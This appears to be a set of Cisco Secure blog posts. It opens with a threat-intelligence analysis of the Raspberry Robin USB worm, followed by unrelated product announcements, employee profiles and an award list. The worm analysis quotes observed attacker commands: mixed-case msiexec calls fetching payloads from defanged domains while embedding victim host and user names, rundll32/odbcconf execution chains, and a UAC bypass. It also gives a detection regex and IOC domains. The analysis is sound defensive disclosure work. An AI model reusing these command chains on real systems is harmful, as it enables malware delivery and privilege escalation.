Raspberry Robin: Highly Evasive Worm Spreads over External Disks

By Onur Mustafa Erdogan

Introduction

During our threat hunting exercises in recent months, we’ve started to observe a distinguishing pattern of msiexec.exe usage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered malware called Raspberry Robin. The RedCanary Research Team first coined the name for this malware in their blog post, and Sekoia published a Flash Report about the activity under the name of QNAP Worm. Both articles offer great analysis of the malware’s behavior. Our findings support and enrich prior research on the topic.

Execution Chain

Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

Image 1: Execution chain of Raspberry Robin

Let’s walkthrough the steps of the kill-chain to see how this malware functions.

Delivery and Exploitation

Raspberry Robin is delivered through infected external disks. Once attached, cmd.exe tries to execute commands from a file within that disk. This file is either a .lnk file or a file with a specific naming pattern. Files with this pattern exhibit a 2 to 5 character name with an usually obscure extension, including .swy, .chk, .ico, .usb, .xml, and .cfg. Also, the attacker uses an excessive amount of whitespace/non printable characters and changing letter case to avoid string matching detection techniques. Example command lines include:

  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /R C:\WINDOWS\system32\cmd.exe<Gne.Swy

File sample for delivery can be found in this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations

Next, we observe explorer.exe running with an obscure command line argument, spawned by a previous instance of cmd.exe. This obscure argument seems to take the name of an infected external drive or .lnk file that was previously executed. Some of the samples had values including USB, USB DISK, or USB Drive, while some other samples had more specific names. On every instance of explorer.exe we see that the adversary is changing the letter case to avoid detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK

Installation

After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -q or /q together with standard installation parameter to operate quietly. Once again, mixed case letters are used to bypass detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you can see above, URLs used for payload download have a specific pattern. Domains use 2 to 4 character names with obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths have a single directory with a random string 11 characters long, followed by hostname and the username of the victim. On network telemetry, we also observed the Windows Installer user agent due to the usage of msiexec.exe. To detect Raspberry Robin through its URL pattern, use this regex:

^http[s]{0,1}\:\/\/[a-zA-Z0-9]{2,4}\.[a-zA-Z0-9]{2,6}\:8080\/[a-zA-Z0-9]+\/.*?(?:-|\=|\?).*?$

If we look up the WHOIS information for given domains, we see domain registration dates going as far back as February 2015. We also see an increase on registered domains starting from September 2021, which aligns with initial observations of Raspberry Robin by our peers.

WHOIS Creation Date Count
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Table 1: Distribution of domain creation dates over time

 

Associated domains have SSL certificates with the subject alternative name of q74243532.myqnapcloud.com, which points out the underlying QNAP cloud infra. Also, their URL scan results return login pages to QTS service of QNAP:

Image 2: QNAP QTS login page from associated domains

Once the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or control.exe. These binaries are used to execute the payload stored in C:\ProgramData\[3 chars]\

  • C:\WINDOWS\system32\rundll32.exe shell32.dll ShellExec_RunDLL C:\WINDOWS\syswow64\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:\ProgramData\Azu\wnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:\Windows\system32\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:\Windows\syswow64\odbcconf.exe -s -C -a {regsvr C:\ProgramData\Tvb\zhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:\WINDOWS\syswow64\odbcconf -E /c /C -a {regsvr C:\ProgramData\Euo\ikdvnbb.xml.}
  • C:\WINDOWS\system32\rundll32.exe SHELL32,ShellExec_RunDLL C:\WINDOWS\syswow64\CONTROL.EXE C:\ProgramData\Lzm\qkuiht.lkg.

It is followed by the execution of fodhelper.exe, which has the auto elevated bit set to true. It is often leveraged by adversaries in order to bypass User Account Control and execute additional commands with escalated privileges [3]. To monitor suspicious executions of fodhelper.exe, we suggest monitoring its instances without any command line arguments.

Command and Control

Raspberry Robin sets up its C2 channel through the additional execution of system binaries without any command line argument, which is quite unusual. That likely points to process injection given elevated privileges in previous steps of execution. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.

Detection through Global Threat Alerts

In Cisco Global Threat Alerts available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track this activity under the Raspberry Robin threat object. Image 3 shows a detection sample of Raspberry Robin:

Image 3: Raspberry Robin detection sample in Cisco Global Threat Alerts

Conclusion

Raspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and abuse of compromised QNAP accounts. Although we have similar intelligence gaps (how it infects external disks, what are its actions on objective) like our peers, we are continuously observing its activities.

Indicators of Compromise

Type Stage IOC
Domain Payload Delivery k6j[.]pw
Domain Payload Delivery kjaj[.]top
Domain Payload Delivery v0[.]cx
Domain Payload Delivery zk4[.]me
Domain Payload Delivery zk5[.]co
Domain Payload Delivery 0dz[.]me
Domain Payload Delivery 0e[.]si
Domain Payload Delivery 5qw[.]pw
Domain Payload Delivery 6w[.]re
Domain Payload Delivery 6xj[.]xyz
Domain Payload Delivery aij[.]hk
Domain Payload Delivery b9[.]pm
Domain Payload Delivery glnj[.]nl
Domain Payload Delivery j4r[.]xyz
Domain Payload Delivery j68[.]info
Domain Payload Delivery j8[.]si
Domain Payload Delivery jjl[.]one
Domain Payload Delivery jzm[.]pw
Domain Payload Delivery k6c[.]org
Domain Payload Delivery kj1[.]xyz
Domain Payload Delivery kr4[.]xyz
Domain Payload Delivery l9b[.]org
Domain Payload Delivery lwip[.]re
Domain Payload Delivery mzjc[.]is
Domain Payload Delivery nt3[.]xyz
Domain Payload Delivery qmpo[.]art
Domain Payload Delivery tiua[.]uk
Domain Payload Delivery vn6[.]co
Domain Payload Delivery z7s[.]org
Domain Payload Delivery k5x[.]xyz
Domain Payload Delivery 6Y[.]rE
Domain Payload Delivery doem[.]Re
Domain Payload Delivery bpyo[.]IN
Domain Payload Delivery l5k[.]xYZ
Domain Payload Delivery uQW[.]fUTbOL
Domain Payload Delivery t7[.]Nz
Domain Payload Delivery 0t[.]yT

References

  1. Raspberry Robin gets the worm early – https://redcanary.com/blog/raspberry-robin/
  2. QNAP worm: who benefits from crime? – https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/

Unscrambling Cybersecurity Acronyms: The ABCs of Endpoint Security

By Nirav Shah

Ransomware and other advanced attacks continue to evolve and threaten organizations around the world. Effectively defending your endpoints from these attacks can be a complex undertaking, and a seemingly endless number of security acronyms only compounds that complexity. There are so many acronyms – EPP, EDR, MEDR, MDR, XDR, and more – for various cybersecurity products and services that it becomes difficult to understand the differences between them and choose the right solution for your organization. Deciphering all these acronyms is a task on its own and deciding which solution works best for you is even more challenging.

We here at Cisco believe that understanding these acronyms and determining which security products or services are the best fit for your organization’s needs doesn’t have to be so hard. That’s why we developed this blog – the first in a series – to give you an overview of the different types of threat detection and response solutions.

This series will help you understand the benefits and disadvantages of each solution, the similarities and differences between these solutions, and how to identify the right solution for your organization. Now let’s go over the different types of security solutions.

Overview of Threat Detection and Response Solutions

There are several types of threat detection and response solutions, including:

  • Endpoint Detection and Response (EDR) A product that monitors, detects, and responds to threats across your endpoint environment
  • Managed Endpoint Detection and Response (MEDR) A managed service operated by a third-party that monitors, detects, and responds to threats across your endpoint environment
  • Managed Detection and Response (MDR) A managed service operated by a third-party that monitors, detects, and responds to threats across your cybersecurity environment
  • Extended Detection and Response (XDR) A security platform that monitors, detects, and responds to threats across your cybersecurity environment with consolidated telemetry, unified visibility and coordinated response

These solutions are similar in that they all enable you to detect and respond to threats, but they differ by the environment(s) being monitored for threats, who conducts the monitoring, as well as how alerts are consolidated and correlated. For instance, certain solutions will only monitor your endpoints (EDR, MEDR) while others will monitor a broader environment (XDR, MDR). In addition, some of these solutions are actually managed services where a third-party monitors your environment (MEDR, MDR) versus solutions that you monitor and manage yourself (EDR, XDR).

How to Select the Right Solution for your Organization

When evaluating these solutions, keep in mind that there isn’t a single correct solution for every organization. This is because each organization has different needs, security maturities, resource levels, and goals. For example, deploying an EDR makes sense for an organization that currently has only a basic anti-virus solution, but this seems like table stakes to a company that already has a Security Operations Center (SOC).

That being said, there are a few questions you can ask yourself to find the cybersecurity solution that best fits your needs, including:

  • What are our security goals? Where are we in our cybersecurity journey?
  • Do we have a SOC or want to build a SOC?
  • Do we have the right cybersecurity talent, skills, and knowledge?
  • Do we have enough visibility and context into security incidents? Do we suffer from too many alerts and/or too many security tools?
  • How long does it take us to detect and respond to threats? Is that adequate?

Of these questions, the most critical are about your security goals and current cybersecurity posture. For instance, organizations at the beginning of their security journey may want to look at an EDR or MEDR solution, while companies that are further along their journey are more likely to be interested in an XDR. Asking whether you already have or are willing to build out a SOC is another essential question. This will help you understand whether you should run your security yourself (EDR, XDR) or find a third-party to manage it for you (MEDR, MDR).

Asking whether you have or are willing to hire the right security talent is another critical question to pose. This will also help determine whether to manage your cybersecurity solution yourself or have a third-party run it for you. Finally, questions about visibility and context, alert, and security tool fatigue, as well as detection and response times will help you to decide if your current security stack is sufficient or if you need to deploy a next-generation solution such as an XDR.

These questions will help guide your decision-making process and give you the information you need to make an informed decision on your cybersecurity solution. For more details on the different endpoint security acronyms and how to determine the right solution for your organization, keep an eye out for the next blog in this series – Unscrambling Cybersecurity Acronyms: The ABCs of EDR and MEDR. Stay tuned!

 

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

 

Advocating for Passion, Kindness and Women in STEM

By Mary Kate Schmermund

Over her 25-year-plus career, Saleema Syed has seen the information security industry from a variety of vantage points, all while championing women in technology. Syed worked as director of business systems and data management for Duo Security before rising to vice president of information technology. Later, after Duo was acquired by Cisco, she transitioned to new roles within the larger organization and now heads up operations for Webex Marketing. In this position Syed brings structure across different functions of marketing including brand, events and technology while also serving as chief operating officer for Chief Marketing Officer Aruna Ravichandran.

“I fell in love with the culture, the kindness, the heart of this company,” Syed said.

Recently, she shared her passion for problem solving and inclusion with the Duo Blog, along with the advice she gives mentees navigating their own career paths.

Not Staying Comfortable, But Always Staying Kind

What about your work energizes you?

Saleema Syed: I like chaos and I love putting a method to the madness. With marketing we have to react to the market, react to the business, react internally. What energizes me is there’s never a dull day and there is always this ability to bring some overall end to end process.

I love running towards a burning car and figuring out how to put it out. I love change. I know change is the only constant and rather than running away from it, I thrive in it. I like to look at it and ask, “What can we do to break it down and figure out what we need to do?”

My brain works in terms of boxes and flows and charts and spreadsheets so when I look at something I’m like, “Okay, what is a box? What is a process? How do I untangle it?” I like sitting in the discomfort and understanding what to do to get out of it.

What drives your career decisions in terms of transitioning from different roles and parts of an organization?

Saleema Syed: There are three things I always keep in mind when I look at what I’m doing and where I want to be. One is, at the core of it, does it fill my cup of empathy and allow me to be true to who I am in how I treat people or how I build a team?

The second thing is, will I have the opportunity to influence and impact the people on the team or my family? How do I show myself to my daughter who is growing and seeing how to become who she is as a career person?

The third thing is, is it something new and am I learning something? Continuous learning is a huge part of who I am, so that drives me to get out of my comfort zone constantly.

When I’m changing jobs people usually say, “You’ve set up this team, you’re so comfortable. Now all you have to do is sit back and execute.” And my answer is, “That’s exactly why I am moving.”

If I am comfortable I’m not learning, and I don’t know if I’m adding any more value than I’ve set up. That means it’s time for me to move on and elevate somebody. What I’m doing is sending the elevator down to somebody on the team to grow.

That’s why I’ve had people who work for me for many years follow me through multiple organizations, which as a leader has been my pinnacle of what I call my success. Success is not my role; it is how many people I have impacted and influenced.

How do you determine the types of problems you want to solve and challenges you want to approach professionally?

Saleema Syed: I keep going back to Duo because working at that organization and meeting those people defined me as a human being. One of the strategic pillars of that organization is to be kinder than necessary.

However complicated the work challenges are, those around me must be aligned with what my integral values are and who I am. They have to have empathy and kindness in their heart. If that is not there, no matter how much I love solving challenges and know I can solve them, I’m not going to go for it. I’ve been extremely lucky at Duo, Cisco and Webex that I’ve been around those kinds of people.

If you look at Webex, I love the core of what we are, the journey we are on, the inclusivity. We are not just selling Webex messaging or other products. At the heart of it we are looking at how we are influencing people and things around us by making sure that there is inclusivity in the collaboration tools that we are launching.

Leading Through Inclusivity + Advocating for Women in Technology

What is your leadership style?

Saleema Syed: My leadership style is pretty simple: nobody works for me; people work with me. I lead with making sure that people know this is the problem you’re trying to solve, here is the context of what we are trying to do. Now, let’s figure out how we solve it. That is something that has helped my team be part of the problem solving that I love to do.

When I interview people my first questions are, “What does the job bring to you? How would this job fill your cup?” That throws people off every time. You can teach any technology, you can teach any skill set, but if you don’t have the basic passion, the attitude to be able to do this job, then everything else can just go out the door.

As a leader who is a woman of color, what particular challenges, triumphs or learning have you experienced?

Saleema Syed: I have a very diverse background. I am an Indian by birth and grew up in the Middle East. When I went into engineering, finished my education and started my career, one of the things I realized was that as a woman of color, I always wanted to apply for positions that I was fully qualified for. I wanted to make sure I knew everything about the job because a very big fear was being asked a question in the interview I didn’t know. LinkedIn’s Gender Insights Report found that women apply for 20% fewer jobs than men despite similar job search behaviors. That has been a very challenging mental barrier for me to break.

Trey Boynton, who was at Duo and now she’s leading Cisco in a beautiful journey of diversity as the senior director of inclusion and collaboration strategy always said, “We have to have that bicycle lane on the road, whether it is for females, whether it is for people of color or any LGBTQIA+ community members. That is how we get people to bring that confidence in to learn, grow and then they can merge easily.”

“Passion is a part of who I am and is contributing to my growth.” – Saleema Syed

Whatever I faced as I was growing up, whether it was my dark skin, whether it was my accent, whether it was, “Oh, you’re way too passionate” has been some of the feedback that I’ve gotten. In my career if I’m told I’m way too passionate I turn that around and say, “Passion is a part of who I am and is contributing to my growth.”

How else do you advocate?

Saleema Syed: Within Webex, within Cisco, I try to be part of anything that I can do in terms of giving back to the community. I’m definitely a big proponent of women in technology. In the local Dallas area I run a program by myself and go into schools and advocate for girls in STEM. Cisco is amazing in how it gives us time to volunteer. I love that educating kids is part of my journey of giving back. That’s the generation you can influence.

How do we enable children and women to be more open to technology and being part of the technology field? Let’s look at the percentage of diversity in the technology field and be aware of it. It’s not only about the diversity numbers, but are we bringing in candidates at the leadership level and giving them not just a seat at the table but a voice at the table, too?

You also have to talk about what you do and with passion and energy because if you don’t, people get intimidated. If you can influence one person who comes from an underrepresented community, imagine what you are doing, not just for that person, but for his household, for his family, for his extended community. I have a lot more to do, but as I get into the next decade of my life and my career, that is something that is a huge focus for me.

What advice do you have for people navigating their careers and wanting to enter tech and cybersecurity?

Saleema Syed: First and foremost it’s very important to spend time and understand the business and the products in whatever industry you’re going into. It is key to your growth. Especially if it’s a security industry, take time to understand the products, the technology or the function that you’re trying to get into. Contextual understanding and product understanding are extremely important.

The second piece is to keep learning. Cisco is amazing in trying to help you learn and support you financially to be able to do it. I went back and got my executive MBA four years ago. Give yourself a goal of learning a new something, whether it is a new function, new technology or new leadership skill.

The third piece is to create a spreadsheet of where you want to be in two years. Put that out there and then work back just like you would do a project plan. Work back month by month, quarter by quarter. What are the skill sets you need to learn to get there?

The last part is: Do the job you want versus the job you are in. Of course, you have to do the job you are in, but do the job you want to get to. Don’t wait for a title, don’t wait for a promotion to act. No. What do you want to be? Show that to your leaders and yourself. The title will come, money will come, everything will come, but am I doing the job that I want and enjoy and I want to get to?

Join Us

To learn more about Webex, Cisco and Duo Security and how you can apply your passion, advocacy and problem solving to make a difference in cybersecurity, browse our open roles.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

More than a VPN: Announcing Cisco Secure Client (formerly AnyConnect)

By Jay Bethea

We’re excited to announce Cisco Secure Client, formerly AnyConnect, as the new version of one of the most widely deployed security agents. As the unified security agent for Cisco Secure, it addresses common operational use cases applicable to Cisco Secure endpoint agents. Those who install Secure Client’s next-generation software will benefit from a shared user interface for tighter and simplified management of Cisco agents for endpoint security.

Screengrab of the new Cisco Secure Client UI

 

Go Beyond Traditional Secure Access

Swift Endpoint Detection & Response and Improved Remote Access

Now, with Secure Client, you gain improved secure remote access, a suite of modular security services, and a path for enabling Zero Trust Network Access (ZTNA) across the distributed network. The newest capability is in Secure Endpoint as a new module within the unified endpoint agent framework. Now you can harness Endpoint Detection & Response (EDR) from within Secure Client. You no longer need to deploy and manage Secure Client and Secure Endpoint as separate agents, making management more effortless on the backend.

Increased Visibility and Simplified Endpoint Security Agents

Within Device Insights, Secure Client lets you deploy, update, and manage your agents from a new cloud management system inside SecureX. If you choose to use cloud management, Secure Client policy and deployment configuration are done in the Insights section of Cisco SecureX. Powerful visibility capabilities in SecureX Device Insights show which endpoints have Secure Client installed in addition to what module versions and profiles they are using.

Screengrab of the Securex Threat Response tool, showing new Secure Client features.

The emphasis on interoperability of endpoint security agents helps provide the much-needed visibility and simplification across multiple Cisco security solutions while simultaneously reducing the complexity of managing multiple endpoints and agents. Application and data visibility is one of the top ways Secure Client can be an important part of an effective security resilience strategy.

View of the SecureX Device Insights UI with new Secure Client features.

 

Visit our homepage to see how Secure Client can help your organization today.

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

 

Cisco and AWS: Securing your resilience in a hybrid cloud world

By Justin Buchanan

We’ve all seen the headlines like “race to the cloud” and “cloud-first.” These articles and publications are true, more and more customers have adopted cloud strategies, but there is more to the story. In these customer conversations, cloud security and network security are often discussed in unison. Why is that?   

Customers desire freedom and choice when establishing resilience across every aspect of their business, and this requires both the ability to remain agile, and maintain control of their organization’s most sensitive data. Neither of these can be achieved with just the cloud, or private data center. Organizations are investing in hybrid-multicloud environments to ensure continuity amidst unpredictable threats and change. But these investments will fall short if they do not include security. 

The modern enterprise relies on the network more than ever before, and it looks a lot different than it did 10 years ago. According to our 2022 Global Hybrid Cloud Trends Report, where 2,500 global IT leaders were interviewed across 13 countries, 82% said they have adopted hybrid cloud architectures, and 47% of organizations use between two and three public IaaS clouds1. As organizations have grown more dependent on the network, the more complex it has become, making firewall capabilities the most critical element of the hybrid-multicloud security strategy. And Cisco has a firewall capability for every strategy, protecting your most important assets no matter where you choose to deploy it.  

In May, Cisco brought offerings from Umbrella and Duo to the AWS Marketplace. Today at AWS Re:Inforce, Cisco Secure announced furthering its partnership with AWS to drive innovation with the goal to protect the integrity of your business. Validating our commitment to hybrid-multicloud security, Cisco has received the AWS Security Competency Partner designation for Network and Infrastructure Security. This designation was awarded through our demonstrated success with customer engagements and rigorous technical validations of Secure Firewall.  

Now demoing at AWS Re:Inforce: Cisco Secure Firewall as-a-service on AWS 

This week at AWS Re:Inforce, customers can stop by our booth to see our latest firewall innovation. Cisco Secure Firewall as-a-service on AWS builds on our existing portfolio, giving organizations greater flexibility and choice with a radically simplified SaaS offering. If organizations are truly to embrace security across the multi-environment IT, customers demand simplification without compromising security. With a SaaS-based form factor, management and deployment complexity is reduced. NetOps and SecOps teams will enjoy a simplified security architecture where provisioning of firewalls and control plane infrastructure are managed by Cisco. This will save your teams time by removing the need to rearchitect the network, freeing them to focus on protecting the integrity of your business. 

As organizations continue to move more of their day-to-day operations to the cloud, Cisco and AWS are committed to ensure that security is an integral part of their hybrid multi-cloud strategy. We all have seen the impact of security that is bolted on, or too complex. If we are truly to find that balance between agility and protection to ensure business continuity, we need to ensure the same protections we have in the private infrastructure are easily consumed no matter where your data may roam.  

Additional Resources 

Product page: Cisco Secure Firewall for Public Cloud 

Partner page: Cisco solutions on AWS 

Blog: Securing cloud is everyone’s responsibility 

Quick Start page: Cisco solutions on AWS 

Amazon Partner Network page: Cisco solutions on AWS  

2022 Global Hybrid Cloud Trends Report 

References 

1 Henderson, N. & Hanselman, E. (2022, May 25). 2022 Global Hybrid Cloud Trends Report. 

S&P Global Market Intelligence, commissioned by Cisco Systems. 

https://www.cisco.com/c/en/us/solutions/hybrid-cloud/2022-trends.html


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Salutes the League of Cybersecurity Heroes

By Cristina Errico

We have entered a world where uncertainty has become the normal operating mode for everyone. Within this new frontier, cybersecurity has become even more challenging. However, some cybersecurity professionals have stood out, using their unique skills and resourcefulness to protect the integrity of their businesses, and to withstand unpredictable and dynamically changing threats. In the end, they, and their businesses have emerged even stronger.

These accomplishments have lead them to be selected from over more than 700 Cisco Cybersecurity Advocates – who are also members of Cisco Insider Advocates – to join the League of Cybersecurity Heroes.

Cisco Insider Advocates is a peer networking community developed several years ago for Cisco customers around the globe. Currently, over 14,000 customers are using it to share technology insights, feedback, and best practices, and also to make meaningful connections with others in the industry. We at Cisco believe that when we connect, anything is possible, and the Insider Advocacy program is a great example of the great things that can happen when people come together.

Let’s meet our League of Cybersecurity Heroes

Roberto Alunda

As the global CISO of Mediapro, Roberto has deployed Cisco SecureX together with Umbrella, Secure Endpoint, Secure Firewall, ISE, NGIP, Threat Response, AnyConnect, and Web security. With this partnership, Mediapro has reduced its threat detection time by 90%. In addition, they have seen no false positives in their threat detection alerts. It is rare to boast of a 100% success rate, but they can boldly make that pronouncement. All of this has also benefitted Mediapro financially by incurring zero fines for any compliance issues

Blair Anderson

What do music, cybersecurity, and teaching all have in common? They all culminate in a readiness to perform. Equally, they all require collaboration, comfort with the unexpected, and a passion for the job. Blair exemplifies the best of these traits, and in doing so, he provides inspiration and excellence to all with whom he interacts. Watching Blair at work makes one wonder if there are more hours granted to him during a day than the average person. He is a time-maximizer, spending most of that time in the service of others.

Kevin Brown

Too often, cybersecurity certifications are treated derisively by some of the very professionals who need them most. This is not the case with Kevin, who can list the many benefits of attaining certifications. Kevin’s desire to improve his knowledge doesn’t stop with technology and cybersecurity. He is an avid reader of anything that can raise him up to be better than he was the day before. With a career that started in the US Marine Corps, Kevin continues to learn and grow, all the while remaining as masterful at a computer keyboard as he is his with his traditional 55-gallon-barrel BBQ smoker and grill.

Steve Cruse

Steve is a Senior Cybersecurity and Network Architect at Lake Trust Credit Union. Like most organizations, Lake Trust has had to transition to a completely remote workforce quickly, and thanks to Secure Network Analytics, they were able to transition the employees to work remotely while maintaining the same high level of visibility and protection in place. Steve was the subject of a case study about the benefits that Cisco products have brought to Lake Trust Credit Unions’ customers. He is currently collaborating to update that information to share more of his knowledge.

Enric Cuixeres

Being the Head of Information Technology is never an easy job. However, when food manufacturer, Leng-d’Or, was faced with a challenge during the pandemic that could have interrupted its production line, quick thinking, skilled leadership, and a close partnership with Cisco all lead to positive outcomes, and helped them to pull through stronger than before. Part of this success comes from Enric’s distinct understanding of the threats, solutions, and processes needed to bring security to a higher level for the Leng-d’Or organization. Enric also shares his success story very freely, adding immeasurable benefits to the security community.

Tony Dous

Cybersecurity is truly a global discipline. Tony Dous proves this by practicing his craft as a Senior Network Security Engineer in Cairo, Egypt. Tony’s involvement with the Cisco community shows how no distance is too far for a motivated cybersecurity professional.

John Patrick Duro

When John Patrick is on the job, there is no longer any feeling that the criminals are one-step ahead of the good guys. He adopted Umbrella together with Meraki to develop a proactive security approach inside his organization. John Patrick created a more unified network from a patchwork of disparate entities. In doing so, he reduced the complexity within the environment. Complexity is so often responsible for security gaps, and John Patrick’s work not only corrected those gaps, but he brought people together in the process. He and his team received great feedback from the employees, who enjoyed a consistent network experience.

Amit Gumber

We often hear stories about teenagers who become enamored with technology, leading to the fulfillment of a dream. Amit Gumber became interested in cybersecurity at an early age, pursued his passion and has worked in the field ever since. His sense of advocacy is best described in his own words: “I’m quite passionate about sharing knowledge and ideas with peers and participating in collaborative activities.” Amit’s use of Cisco technologies has helped HCL Technologies to stabilize and secure their environment.

Mark Healey

One of the most important factors for success is insatiable curiosity. Mark Healey is a continuous learner, and he is an example of someone who enthusiastically shares his knowledge. Whether it is on a personal level, or through his high engagement as part of the Cisco Insider Advocates community, or as an active member of the Internet Society, Mark is an evangelist and a positive voice for cybersecurity.

Wouter Hindriks

Wouter holds a special designation, not only as a member of the League of Cybersecurity Heroes, but also as the recipient of the “Cybersecurity Defender of the Year” award. Wouter is an active participant in the cybersecurity community, working with an almost evangelical zeal towards sharing the importance of holistic cybersecurity. His contributions stand out towards making the cyber realm a safer place.

Bahruz Ibrahimov

It is often said that the job of a cybersecurity professional in an educational facility is especially challenging. When that facility happens to be the largest in an entire country, with over 4,000 schools and universities, the job of protecting it can seem insurmountable. At AzEduNet, in Azerbaijan, Bahruz and his team is tasked with securing the network for its 1.5 Million students. With Cisco Secure, the security team reduced security incidents by 80%. This not only ensures access for the students, but also keeps the data safe.

Walther Noel Meraz Olivarria

Many people want to enter the cybersecurity profession, but few have the dedication and perseverance to fully embrace the skillset required to meet that goal. Walther Noel not only had the desire to refocus his career, but he proved it by earning the CyberOps Associate Certification. His accomplishment is a prime example of how one can step outside of their comfort zone to grow and thrive.

Pascual Sevilla

Pascual demonstrates how important it is to make the most of the learning opportunities in Cisco Insiders Advocates. While already a successful NOC engineer, he sought to advance his professional development by studying cybersecurity. He passed the CCNA CyberOps 200-201 exam, moving him closer to propelling his career to even higher achievements.

Inderdeep Singh

One of the noblest expressions of knowledge is the desire to freely share that information. Inderdeep lives up to this ideal, offering his expertise to all with no expectations of reciprocity. His charitable spirit has not gone unnoticed, as he has been a previous award winner for Cisco IT Blogs, as well as a designation on the Feedspot top 100 Networking Blog.

Luigi Vassallo

Being the first to try a new technology can be a risky proposition. However, as a COO, risk calculations are in one’s blood. Luigi, along with the Sara Assicurazioni organization, hails as the first company in Italy to embrace cloud technology. As a company with more than one million customers, this was a bold initiative that required careful planning, keen insight, and above all, collaboration. In the end, this has resulted not only in a digital transformation, but a business transformation.

Whether it is a technical achievement, a personal triumph, or a spirit of helping others, each member of our League of Cybersecurity Heroes proves how technology and humanity can work together to accomplish the impossible. Congratulations to all of them!

Want to learn more about how Cisco can help you succeed?

Join the Cisco Insider Advocacy community

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

 

A Unique Cybersecurity Career Path: From Journalism to Cisco

By Mary Kate Schmermund

Few security career paths are linear. For Stephanie Frankel the journey to Cisco Secure was circuitous. The Ann Arbor, Michigan native studied journalism at the University of Michigan before managing communications for the Washington Capitals and NBC Sports. But after several stints at communications agencies, she charted a new path for herself in cybersecurity. Not only has her diverse background served as a strength in her current role as senior manager for strategy and operations, but it’s also informed her management philosophy.

Road to Cybersecurity

After doing project management and account direction at consulting agencies, Frankel was interested in honing her skills and expertise on the client side. She had heard amazing things about Duo and wanted to stay in Ann Arbor and work for a company with local roots. After interviewing, Frankel realized that “working at Duo was a cool, exciting opportunity with a really awesome group of people.”

Frankel was on the ground running working as a technical project manager in research and development overseeing the Multi-Factor Authentication, applications and mobile engineering teams despite not having worked in information security before.

Duo’s security education allowed Frankel to understand the industry and is something she values for getting more people into the cybersecurity field. At Duo and Cisco Secure, employees come from a variety of backgrounds and some don’t have much (or any) experience with cybersecurity.

Robust educational programs build knowledge about security and specific products which empower new team members to grow and learn. Every team also has a learning and development budget for employees to quench their curiosity and enhance their knowledge through courses, books or other programs Manager of Global Employee Programs Anndrea Boris shared.

“People are open to having conversations and open to ideas and ways to solve those ideas. If you have an idea of how to solve a problem, no matter whether it’s your job or not, people are open and willing to listen to you.” – Stephanie Frankel

Something Frankel also appreciates most is that ideas are valued at Duo and Cisco Secure: “Even in my first job, I would have ideas and go to my boss or our head of engineering and say, ‘Hey, I think this could be a really cool opportunity, and I think it needs this.’ People are open to having conversations and open to ideas and ways to solve those ideas. If you have an idea of how to solve a problem, no matter whether it’s your job or not, people are willing to listen to you.”

After a year, Frankel moved from engineering to marketing to run operations for Duo’s in-house brand team, leading the team through a rebrand. “The team really rallied behind this new brand and it was amazing to see their pride and hard work when sharing it,” she said. With Frankel’s leadership, the team showcased not only the new look and feel of the brand but also the customer research that went into understanding the need for the change.

